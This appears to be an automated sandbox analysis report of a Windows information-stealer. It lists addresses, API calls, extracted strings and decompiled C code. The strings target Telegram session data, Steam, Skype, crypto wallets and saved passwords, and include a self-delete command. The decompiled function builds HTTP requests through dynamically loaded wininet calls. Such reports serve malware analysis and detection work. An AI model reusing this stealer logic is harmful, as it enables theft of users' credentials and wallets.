                                                                                                                                                                                          0x004192f5
                                                                                                                                                                                          0x00419300
                                                                                                                                                                                          0x00419308
                                                                                                                                                                                          0x0041930f
                                                                                                                                                                                          0x0041931e
                                                                                                                                                                                          0x00419321
                                                                                                                                                                                          0x00419909
                                                                                                                                                                                          0x00419909
                                                                                                                                                                                          0x0041990c
                                                                                                                                                                                          0x00419917
                                                                                                                                                                                          0x0041991c
                                                                                                                                                                                          0x0041992d
                                                                                                                                                                                          0x0041993d
                                                                                                                                                                                          0x00419948
                                                                                                                                                                                          0x00419959
                                                                                                                                                                                          0x0041995e
                                                                                                                                                                                          0x00419964
                                                                                                                                                                                          0x0041996f
                                                                                                                                                                                          0x00419980
                                                                                                                                                                                          0x00419985
                                                                                                                                                                                          0x0041998b
                                                                                                                                                                                          0x00419996
                                                                                                                                                                                          0x004199a7
                                                                                                                                                                                          0x004199b8
                                                                                                                                                                                          0x004199bd
                                                                                                                                                                                          0x004199c3
                                                                                                                                                                                          0x004199ce
                                                                                                                                                                                          0x004199df
                                                                                                                                                                                          0x004199f0
                                                                                                                                                                                          0x004199f5
                                                                                                                                                                                          0x004199fb
                                                                                                                                                                                          0x00419a06
                                                                                                                                                                                          0x00419a17
                                                                                                                                                                                          0x00419a28
                                                                                                                                                                                          0x00419a2d
                                                                                                                                                                                          0x00419a33
                                                                                                                                                                                          0x00419a3e
                                                                                                                                                                                          0x00419a4f
                                                                                                                                                                                          0x00419a60
                                                                                                                                                                                          0x00419a65
                                                                                                                                                                                          0x00419a6b
                                                                                                                                                                                          0x00419a76
                                                                                                                                                                                          0x00419a7d
                                                                                                                                                                                          0x00419a8e
                                                                                                                                                                                          0x00419a9f
                                                                                                                                                                                          0x00419aa4
                                                                                                                                                                                          0x00419aaa
                                                                                                                                                                                          0x00419ab5
                                                                                                                                                                                          0x00419abc
                                                                                                                                                                                          0x00419acd
                                                                                                                                                                                          0x00419ade
                                                                                                                                                                                          0x00419ae3
                                                                                                                                                                                          0x00419ae9
                                                                                                                                                                                          0x00419af4
                                                                                                                                                                                          0x00419afb
                                                                                                                                                                                          0x00419b0c
                                                                                                                                                                                          0x00419b1d
                                                                                                                                                                                          0x00419b22
                                                                                                                                                                                          0x00419b28
                                                                                                                                                                                          0x00419b33
                                                                                                                                                                                          0x00419b3a
                                                                                                                                                                                          0x00419b4b
                                                                                                                                                                                          0x00419b5c
                                                                                                                                                                                          0x00419b61
                                                                                                                                                                                          0x00419b67
                                                                                                                                                                                          0x00419b75
                                                                                                                                                                                          0x00419b7a
                                                                                                                                                                                          0x00419b80
                                                                                                                                                                                          0x00419b8b
                                                                                                                                                                                          0x00419b9c
                                                                                                                                                                                          0x00419ba1
                                                                                                                                                                                          0x00419baf
                                                                                                                                                                                          0x00419bb4
                                                                                                                                                                                          0x00419bb9
                                                                                                                                                                                          0x00419bc1
                                                                                                                                                                                          0x00419bcb
                                                                                                                                                                                          0x00419bce
                                                                                                                                                                                          0x00419bd3
                                                                                                                                                                                          0x00419bdb
                                                                                                                                                                                          0x00419be0
                                                                                                                                                                                          0x00419be6
                                                                                                                                                                                          0x00419beb
                                                                                                                                                                                          0x00419bf3
                                                                                                                                                                                          0x00419bf8
                                                                                                                                                                                          0x00419bfe
                                                                                                                                                                                          0x00419c03
                                                                                                                                                                                          0x00419c0b
                                                                                                                                                                                          0x00419c10
                                                                                                                                                                                          0x00419c16
                                                                                                                                                                                          0x00419c1b
                                                                                                                                                                                          0x00419c25
                                                                                                                                                                                          0x00419c2a
                                                                                                                                                                                          0x00419c2e
                                                                                                                                                                                          0x00419c30
                                                                                                                                                                                          0x00419c33
                                                                                                                                                                                          0x00419c38
                                                                                                                                                                                          0x00419c46
                                                                                                                                                                                          0x00419c54
                                                                                                                                                                                          0x00419c54
                                                                                                                                                                                          0x00419c64
                                                                                                                                                                                          0x00419c70
                                                                                                                                                                                          0x00419c75
                                                                                                                                                                                          0x00419c7a
                                                                                                                                                                                          0x00419c83
                                                                                                                                                                                          0x00419c8a
                                                                                                                                                                                          0x00419c91
                                                                                                                                                                                          0x00419c99
                                                                                                                                                                                          0x00419c9e
                                                                                                                                                                                          0x00419ca1
                                                                                                                                                                                          0x00419db1
                                                                                                                                                                                          0x00419db1
                                                                                                                                                                                          0x00419dbc
                                                                                                                                                                                          0x00419dcc
                                                                                                                                                                                          0x00419dd1
                                                                                                                                                                                          0x00419dec
                                                                                                                                                                                          0x00419df4
                                                                                                                                                                                          0x00419df9
                                                                                                                                                                                          0x00419dff
                                                                                                                                                                                          0x00419e03
                                                                                                                                                                                          0x00419e16
                                                                                                                                                                                          0x00419e1b
                                                                                                                                                                                          0x00419e25
                                                                                                                                                                                          0x00419e31
                                                                                                                                                                                          0x00419e39
                                                                                                                                                                                          0x00419e4a
                                                                                                                                                                                          0x00419e5a
                                                                                                                                                                                          0x00419e6b
                                                                                                                                                                                          0x00419e7e
                                                                                                                                                                                          0x00419e8f
                                                                                                                                                                                          0x00419ea0
                                                                                                                                                                                          0x00419ebb
                                                                                                                                                                                          0x00419ecb
                                                                                                                                                                                          0x00419ed9
                                                                                                                                                                                          0x00419eea
                                                                                                                                                                                          0x00419efb
                                                                                                                                                                                          0x00419f0b
                                                                                                                                                                                          0x00419f11
                                                                                                                                                                                          0x00419f13
                                                                                                                                                                                          0x00419f20
                                                                                                                                                                                          0x00419f27
                                                                                                                                                                                          0x00419f2b
                                                                                                                                                                                          0x00419f2b
                                                                                                                                                                                          0x00419e03
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419df9
                                                                                                                                                                                          0x00419ddb
                                                                                                                                                                                          0x00419de0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419de2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419ca7
                                                                                                                                                                                          0x00419ca7
                                                                                                                                                                                          0x00419cb2
                                                                                                                                                                                          0x00419cc1
                                                                                                                                                                                          0x00419cc4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419cca
                                                                                                                                                                                          0x00419ccb
                                                                                                                                                                                          0x00419ccd
                                                                                                                                                                                          0x00419ccd
                                                                                                                                                                                          0x00419cdd
                                                                                                                                                                                          0x00419ce2
                                                                                                                                                                                          0x00419ce5
                                                                                                                                                                                          0x00419cf3
                                                                                                                                                                                          0x00419d00
                                                                                                                                                                                          0x00419d03
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419d13
                                                                                                                                                                                          0x00419d18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419d1e
                                                                                                                                                                                          0x00419d2c
                                                                                                                                                                                          0x00419d31
                                                                                                                                                                                          0x00419d3f
                                                                                                                                                                                          0x00419d42
                                                                                                                                                                                          0x00419d85
                                                                                                                                                                                          0x00419d85
                                                                                                                                                                                          0x00419d89
                                                                                                                                                                                          0x00419d96
                                                                                                                                                                                          0x00419da4
                                                                                                                                                                                          0x00419da4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419d89
                                                                                                                                                                                          0x00419d44
                                                                                                                                                                                          0x00419d45
                                                                                                                                                                                          0x00419d4c
                                                                                                                                                                                          0x00419d5b
                                                                                                                                                                                          0x00419d66
                                                                                                                                                                                          0x00419d75
                                                                                                                                                                                          0x00419d7d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419d7f
                                                                                                                                                                                          0x00419d82
                                                                                                                                                                                          0x00419d83
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419d83
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419da9
                                                                                                                                                                                          0x00419da9
                                                                                                                                                                                          0x00419daa
                                                                                                                                                                                          0x00419daa
                                                                                                                                                                                          0x00419daa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419ccd
                                                                                                                                                                                          0x00419327
                                                                                                                                                                                          0x00419327
                                                                                                                                                                                          0x00419328
                                                                                                                                                                                          0x0041932a
                                                                                                                                                                                          0x00419338
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419340
                                                                                                                                                                                          0x004193bb
                                                                                                                                                                                          0x004193bd
                                                                                                                                                                                          0x004193bd
                                                                                                                                                                                          0x004193c5
                                                                                                                                                                                          0x004193c8
                                                                                                                                                                                          0x004193cc
                                                                                                                                                                                          0x004193d3
                                                                                                                                                                                          0x004193d8
                                                                                                                                                                                          0x004193dd
                                                                                                                                                                                          0x004193e0
                                                                                                                                                                                          0x004193e7
                                                                                                                                                                                          0x004193e7
                                                                                                                                                                                          0x004193e0
                                                                                                                                                                                          0x004193f6
                                                                                                                                                                                          0x004193fd
                                                                                                                                                                                          0x004193fd
                                                                                                                                                                                          0x0041940c
                                                                                                                                                                                          0x0041941b
                                                                                                                                                                                          0x00419420
                                                                                                                                                                                          0x0041942a
                                                                                                                                                                                          0x0041942a
                                                                                                                                                                                          0x00419439
                                                                                                                                                                                          0x00419440
                                                                                                                                                                                          0x00419440
                                                                                                                                                                                          0x0041944f
                                                                                                                                                                                          0x00419451
                                                                                                                                                                                          0x00419453
                                                                                                                                                                                          0x00419455
                                                                                                                                                                                          0x0041945d
                                                                                                                                                                                          0x00419465
                                                                                                                                                                                          0x00419468
                                                                                                                                                                                          0x0041946d
                                                                                                                                                                                          0x0041946f
                                                                                                                                                                                          0x00419470
                                                                                                                                                                                          0x00419475
                                                                                                                                                                                          0x0041947d
                                                                                                                                                                                          0x0041947d
                                                                                                                                                                                          0x0041948c
                                                                                                                                                                                          0x0041948e
                                                                                                                                                                                          0x0041948e
                                                                                                                                                                                          0x0041948c
                                                                                                                                                                                          0x00419492
                                                                                                                                                                                          0x00419498
                                                                                                                                                                                          0x0041949b
                                                                                                                                                                                          0x00419825
                                                                                                                                                                                          0x0041982e
                                                                                                                                                                                          0x00419830
                                                                                                                                                                                          0x00419836
                                                                                                                                                                                          0x00419839
                                                                                                                                                                                          0x00419841
                                                                                                                                                                                          0x00419846
                                                                                                                                                                                          0x00419846
                                                                                                                                                                                          0x00419851
                                                                                                                                                                                          0x00419854
                                                                                                                                                                                          0x0041985a
                                                                                                                                                                                          0x00419868
                                                                                                                                                                                          0x00419878
                                                                                                                                                                                          0x0041987d
                                                                                                                                                                                          0x004198f7
                                                                                                                                                                                          0x004198fc
                                                                                                                                                                                          0x0041987f
                                                                                                                                                                                          0x0041987f
                                                                                                                                                                                          0x00419893
                                                                                                                                                                                          0x004198a9
                                                                                                                                                                                          0x004198b2
                                                                                                                                                                                          0x004198bf
                                                                                                                                                                                          0x004198c4
                                                                                                                                                                                          0x004198c7
                                                                                                                                                                                          0x004198cc
                                                                                                                                                                                          0x004198da
                                                                                                                                                                                          0x004198e5
                                                                                                                                                                                          0x004198ea
                                                                                                                                                                                          0x004198ea
                                                                                                                                                                                          0x0041987d
                                                                                                                                                                                          0x004194a1
                                                                                                                                                                                          0x004194af
                                                                                                                                                                                          0x004194bd
                                                                                                                                                                                          0x004194d0
                                                                                                                                                                                          0x0041974e
                                                                                                                                                                                          0x00419759
                                                                                                                                                                                          0x00419766
                                                                                                                                                                                          0x00419776
                                                                                                                                                                                          0x0041978a
                                                                                                                                                                                          0x00419796
                                                                                                                                                                                          0x0041979b
                                                                                                                                                                                          0x0041979b
                                                                                                                                                                                          0x0041979e
                                                                                                                                                                                          0x0041979f
                                                                                                                                                                                          0x004197a1
                                                                                                                                                                                          0x004197a9
                                                                                                                                                                                          0x004197ac
                                                                                                                                                                                          0x004197bc
                                                                                                                                                                                          0x004197cd
                                                                                                                                                                                          0x004197d8
                                                                                                                                                                                          0x004197e5
                                                                                                                                                                                          0x004197f0
                                                                                                                                                                                          0x00419802
                                                                                                                                                                                          0x00419813
                                                                                                                                                                                          0x0041981e
                                                                                                                                                                                          0x0041981f
                                                                                                                                                                                          0x00419820
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419820
                                                                                                                                                                                          0x004194da
                                                                                                                                                                                          0x004194df
                                                                                                                                                                                          0x004194e7
                                                                                                                                                                                          0x004194f2
                                                                                                                                                                                          0x004194f3
                                                                                                                                                                                          0x004194f8
                                                                                                                                                                                          0x00419503
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419509
                                                                                                                                                                                          0x00419734
                                                                                                                                                                                          0x00419515
                                                                                                                                                                                          0x00419524
                                                                                                                                                                                          0x00419535
                                                                                                                                                                                          0x00419540
                                                                                                                                                                                          0x00419543
                                                                                                                                                                                          0x00419548
                                                                                                                                                                                          0x0041954a
                                                                                                                                                                                          0x00419556
                                                                                                                                                                                          0x0041955f
                                                                                                                                                                                          0x0041956a
                                                                                                                                                                                          0x0041956b
                                                                                                                                                                                          0x00419570
                                                                                                                                                                                          0x00419583
                                                                                                                                                                                          0x00419594
                                                                                                                                                                                          0x0041959f
                                                                                                                                                                                          0x004195a9
                                                                                                                                                                                          0x004195b4
                                                                                                                                                                                          0x004195b5
                                                                                                                                                                                          0x004195b6
                                                                                                                                                                                          0x004195c4
                                                                                                                                                                                          0x004195cc
                                                                                                                                                                                          0x004195d4
                                                                                                                                                                                          0x004195d7
                                                                                                                                                                                          0x004195dc
                                                                                                                                                                                          0x004195e7
                                                                                                                                                                                          0x004195fc
                                                                                                                                                                                          0x0041960e
                                                                                                                                                                                          0x0041961e
                                                                                                                                                                                          0x0041962c
                                                                                                                                                                                          0x0041963a
                                                                                                                                                                                          0x0041964b
                                                                                                                                                                                          0x00419659
                                                                                                                                                                                          0x0041966a
                                                                                                                                                                                          0x00419675
                                                                                                                                                                                          0x00419682
                                                                                                                                                                                          0x00419692
                                                                                                                                                                                          0x004196a6
                                                                                                                                                                                          0x004196b2
                                                                                                                                                                                          0x004196b7
                                                                                                                                                                                          0x004196b7
                                                                                                                                                                                          0x004196ba
                                                                                                                                                                                          0x004196bb
                                                                                                                                                                                          0x004196cb
                                                                                                                                                                                          0x004196dc
                                                                                                                                                                                          0x004196e7
                                                                                                                                                                                          0x004196f4
                                                                                                                                                                                          0x004196ff
                                                                                                                                                                                          0x0041970e
                                                                                                                                                                                          0x0041971f
                                                                                                                                                                                          0x0041972a
                                                                                                                                                                                          0x0041972b
                                                                                                                                                                                          0x0041972c
                                                                                                                                                                                          0x0041972c
                                                                                                                                                                                          0x00419731
                                                                                                                                                                                          0x00419731
                                                                                                                                                                                          0x00419731
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041973d
                                                                                                                                                                                          0x00419901
                                                                                                                                                                                          0x00419901
                                                                                                                                                                                          0x00419902
                                                                                                                                                                                          0x00419902
                                                                                                                                                                                          0x00419902
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041932a
                                                                                                                                                                                          0x00419321

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00419195
                                                                                                                                                                                            • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                            • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00419460
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00419468
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00419F2B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
                                                                                                                                                                                          • String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
                                                                                                                                                                                          • API String ID: 447519224-805684967
                                                                                                                                                                                          • Opcode ID: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
                                                                                                                                                                                          • Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00418688, Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 375libraryloadernetworkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                          			E00418688(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				char _v73;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v132;
				char _v388;
				char _v516;
				char _v644;
				char _v2692;
				char _v3716;
				char _v3776;
				char _v69412;
				char _v69416;
				char _v69420;
				char _v69424;
				char _v69428;
				char _v69432;
				char _v69436;
				void* __ecx;
				long _t223;
				long _t284;
				void* _t298;
				struct HINSTANCE__* _t321;
				struct HINSTANCE__* _t325;
				void* _t326;
				intOrPtr _t328;
				intOrPtr _t351;
				void* _t358;
				struct _SYSTEMTIME _t369;
				intOrPtr* _t371;
				intOrPtr _t373;
				intOrPtr _t374;

				_t373 = _t374;
				_t328 = 0x21e6;
				do {
					_push(0);
					_push(0);
					_t328 = _t328 - 1;
				} while (_t328 != 0);
				_push(_t328);
				_t1 =  &_v8;
				 *_t1 = _t328;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				_t369 =  &_v3776;
				_push(_t373);
				_push(0x418b80);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(_v16 == 0) {
					E0040357C( &_v16, 0x418b98);
				}
				E004034E4( &_v92);
				E0040357C( &_v56, _v8);
				_v73 = 0;
				E0040357C( &_v52, "wininet.dll");
				_t325 = GetModuleHandleA(E004039E8( &_v52));
				if(_t325 == 0) {
					_t321 = LoadLibraryA(E004039E8( &_v52)); // executed
					_t325 = _t321;
				}
				if(_t325 == 0) {
					(E004039E8( &_v52))[7] = 0;
					_t325 = LoadLibraryA(E004039E8( &_v52));
				}
				_v20 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0xc]));
				_v24 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x1a]));
				_v28 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x2b]));
				_v32 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x3c]));
				_v36 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x53]));
				_v40 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x64]));
				_t371 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x75]));
				_v44 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x89]));
				_v48 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x9b]));
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				 *_t369 = 0x3c;
				 *((intOrPtr*)(_t369 + 4)) =  &_v132;
				 *((intOrPtr*)(_t369 + 8)) = 0x20;
				 *(_t369 + 0x10) =  &_v388;
				 *((intOrPtr*)(_t369 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t369 + 0x1c)) =  &_v516;
				 *((intOrPtr*)(_t369 + 0x20)) = 0x80;
				 *((intOrPtr*)(_t369 + 0x24)) =  &_v644;
				 *((intOrPtr*)(_t369 + 0x28)) = 0x80;
				 *(_t369 + 0x2c) =  &_v2692;
				 *((intOrPtr*)(_t369 + 0x30)) = 0x800;
				 *((intOrPtr*)(_t369 + 0x34)) =  &_v3716;
				 *((intOrPtr*)(_t369 + 0x38)) = 0x400;
				_t223 = E00403790(_v56);
				InternetCrackUrlA(E00403990(_v56), _t223, 0x90000000, _t369);
				E004036DC( &_v100,  *(_t369 + 0x10));
				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
				if(E00403A78(0x418c60, _v69416) != 0) {
					_v73 = 1;
					E004036DC( &_v69420,  *(_t369 + 0x10));
					E004037DC( &_v88, _v69420, "Host: ");
					E00417F6C(_v100, _t325,  &_v69424, _t369, _t371);
					 *(_t369 + 0x10) = E00403990(_v69424);
				}
				_t326 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
				 *(_t369 + 0x10) = 0x41b7c0;
				_v84 = 0x2dc6c0;
				_v48(_t326, 6,  &_v84, 4);
				_v48(_t326, 5,  &_v84, 4);
				_v64 = InternetConnectA(_t326,  *(_t369 + 0x10),  *(_t369 + 0x18), 0, 0, 3, 0, 0);
				if(_v64 != 0) {
					_v80 = 0x84003300;
					E004036DC( &_v69428,  *((intOrPtr*)(_t369 + 4)));
					if(E00403A78(0x418cb4, _v69428) != 0) {
						_v80 = _v80 | 0x00800000;
					}
					_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t369 + 0x2c), 0, 0, 0, _v80, 0);
					if(_v68 != 0) {
						if(_v73 != 0) {
							_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
						}
						_t284 = E00403790(_v12);
						if(HttpSendRequestA(_v68, E00418CB8, 0, E00403990(_v12), _t284) != 0) {
							do {
								E00404F00();
								_v72 = _v40(_v68,  &_v69412, 0x10064,  &_v60);
								E004035D4( &_v96, _v60,  &_v69412);
								_t298 = E00403798( &_v92, _v96);
								asm("sbb eax, eax");
							} while (_t298 + 1 != 0 && _v60 != 0);
						}
					}
					InternetCloseHandle(_v68); // executed
				}
				 *_t371(_v64);
				 *_t371(_t326);
				if(_v92 == 0) {
					_push(_v100);
					_push(_v12);
					_push( *(_t369 + 0x18));
					_push( &_v92);
					E004036DC( &_v69432,  *(_t369 + 0x2c));
					_push(_v69432);
					E004036DC( &_v69436,  *(_t369 + 0x10));
					_pop(_t358); // executed
					E00418124(_v69436, _t326, _v16, _t358, _t371); // executed
				}
				E00403538(_a4, _v92);
				E004034E4( &_v92);
				_pop(_t351);
				 *[fs:eax] = _t351;
				_push(E00418B87);
				E00403508( &_v69436, 6);
				E00403508( &_v100, 4);
				E00403508( &_v56, 2);
				return E00403508( &_v16, 3);
			}























































                                                                                                                                                                                          0x00418689
                                                                                                                                                                                          0x0041868c
                                                                                                                                                                                          0x00418691
                                                                                                                                                                                          0x00418691
                                                                                                                                                                                          0x00418693
                                                                                                                                                                                          0x00418695
                                                                                                                                                                                          0x00418695
                                                                                                                                                                                          0x00418698
                                                                                                                                                                                          0x00418699
                                                                                                                                                                                          0x00418699
                                                                                                                                                                                          0x0041869f
                                                                                                                                                                                          0x004186a2
                                                                                                                                                                                          0x004186a5
                                                                                                                                                                                          0x004186ab
                                                                                                                                                                                          0x004186b3
                                                                                                                                                                                          0x004186bb
                                                                                                                                                                                          0x004186c0
                                                                                                                                                                                          0x004186c8
                                                                                                                                                                                          0x004186c9
                                                                                                                                                                                          0x004186ce
                                                                                                                                                                                          0x004186d1
                                                                                                                                                                                          0x004186d8
                                                                                                                                                                                          0x004186e2
                                                                                                                                                                                          0x004186e2
                                                                                                                                                                                          0x004186ea
                                                                                                                                                                                          0x004186f5
                                                                                                                                                                                          0x004186fa
                                                                                                                                                                                          0x00418706
                                                                                                                                                                                          0x00418719
                                                                                                                                                                                          0x0041871d
                                                                                                                                                                                          0x00418728
                                                                                                                                                                                          0x0041872d
                                                                                                                                                                                          0x0041872d
                                                                                                                                                                                          0x00418731
                                                                                                                                                                                          0x0041873b
                                                                                                                                                                                          0x0041874d
                                                                                                                                                                                          0x0041874d
                                                                                                                                                                                          0x00418761
                                                                                                                                                                                          0x00418776
                                                                                                                                                                                          0x0041878b
                                                                                                                                                                                          0x004187a0
                                                                                                                                                                                          0x004187b5
                                                                                                                                                                                          0x004187ca
                                                                                                                                                                                          0x004187df
                                                                                                                                                                                          0x004187f5
                                                                                                                                                                                          0x0041880c
                                                                                                                                                                                          0x00418817
                                                                                                                                                                                          0x00418827
                                                                                                                                                                                          0x00418837
                                                                                                                                                                                          0x00418847
                                                                                                                                                                                          0x00418857
                                                                                                                                                                                          0x00418867
                                                                                                                                                                                          0x00418873
                                                                                                                                                                                          0x00418878
                                                                                                                                                                                          0x00418881
                                                                                                                                                                                          0x00418884
                                                                                                                                                                                          0x00418891
                                                                                                                                                                                          0x00418894
                                                                                                                                                                                          0x004188a1
                                                                                                                                                                                          0x004188a4
                                                                                                                                                                                          0x004188b1
                                                                                                                                                                                          0x004188b4
                                                                                                                                                                                          0x004188c1
                                                                                                                                                                                          0x004188c4
                                                                                                                                                                                          0x004188d1
                                                                                                                                                                                          0x004188d4
                                                                                                                                                                                          0x004188e4
                                                                                                                                                                                          0x004188f3
                                                                                                                                                                                          0x004188fc
                                                                                                                                                                                          0x0041891d
                                                                                                                                                                                          0x00418934
                                                                                                                                                                                          0x00418936
                                                                                                                                                                                          0x00418943
                                                                                                                                                                                          0x00418956
                                                                                                                                                                                          0x00418964
                                                                                                                                                                                          0x00418974
                                                                                                                                                                                          0x00418974
                                                                                                                                                                                          0x00418987
                                                                                                                                                                                          0x00418989
                                                                                                                                                                                          0x00418991
                                                                                                                                                                                          0x004189a1
                                                                                                                                                                                          0x004189ad
                                                                                                                                                                                          0x004189c7
                                                                                                                                                                                          0x004189ce
                                                                                                                                                                                          0x004189d4
                                                                                                                                                                                          0x004189e4
                                                                                                                                                                                          0x004189fb
                                                                                                                                                                                          0x004189fd
                                                                                                                                                                                          0x004189fd
                                                                                                                                                                                          0x00418a24
                                                                                                                                                                                          0x00418a2b
                                                                                                                                                                                          0x00418a35
                                                                                                                                                                                          0x00418a52
                                                                                                                                                                                          0x00418a52
                                                                                                                                                                                          0x00418a58
                                                                                                                                                                                          0x00418a77
                                                                                                                                                                                          0x00418a79
                                                                                                                                                                                          0x00418a84
                                                                                                                                                                                          0x00418aa0
                                                                                                                                                                                          0x00418aaf
                                                                                                                                                                                          0x00418aba
                                                                                                                                                                                          0x00418ac3
                                                                                                                                                                                          0x00418ac6
                                                                                                                                                                                          0x00418a79
                                                                                                                                                                                          0x00418a77
                                                                                                                                                                                          0x00418ad4
                                                                                                                                                                                          0x00418ad4
                                                                                                                                                                                          0x00418ada
                                                                                                                                                                                          0x00418add
                                                                                                                                                                                          0x00418ae3
                                                                                                                                                                                          0x00418ae8
                                                                                                                                                                                          0x00418aec
                                                                                                                                                                                          0x00418af1
                                                                                                                                                                                          0x00418af5
                                                                                                                                                                                          0x00418aff
                                                                                                                                                                                          0x00418b0a
                                                                                                                                                                                          0x00418b14
                                                                                                                                                                                          0x00418b22
                                                                                                                                                                                          0x00418b23
                                                                                                                                                                                          0x00418b23
                                                                                                                                                                                          0x00418b2e
                                                                                                                                                                                          0x00418b36
                                                                                                                                                                                          0x00418b3d
                                                                                                                                                                                          0x00418b40
                                                                                                                                                                                          0x00418b43
                                                                                                                                                                                          0x00418b53
                                                                                                                                                                                          0x00418b60
                                                                                                                                                                                          0x00418b6d
                                                                                                                                                                                          0x00418b7f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
